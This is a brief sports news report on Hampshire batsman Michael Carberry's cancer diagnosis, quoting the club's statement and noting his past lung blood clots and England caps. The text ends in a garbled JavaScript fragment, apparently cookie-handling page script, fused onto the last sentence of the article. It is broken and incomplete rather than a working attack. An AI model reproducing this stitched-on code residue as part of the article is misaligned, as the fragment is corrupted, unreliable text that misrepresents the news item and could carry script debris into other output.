Hampshire and former England batsman Michael Carberry has been diagnosed with cancer.

Carberry underwent tests during the week after feeling unwell and was left out of Hampshire's County Championship match against Warwickshire this week.

Hampshire released a statement on Thursday evening confirming the news.

"Following recent reports about his health and now that he has spoken fully to his family, friends and team-mates, Hampshire can confirm that after a brief period of feeling unwell, a specialist has determined that Michael Carberry has a tumour that is cancerous. Further tests will be undertaken before the relevant treatment commences," the statement read.

"He is grateful for the messages of support that he has received and hopes that he can focus on his treatment whilst the privacy of those close to him is respected."

Carberry suffered blood clots in one of his lungs six years, in what was a potentially life threatening situation. He currently takes medication to control the condition.

He has played six Test matches and six ODI's with England and 192 First Class matches. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
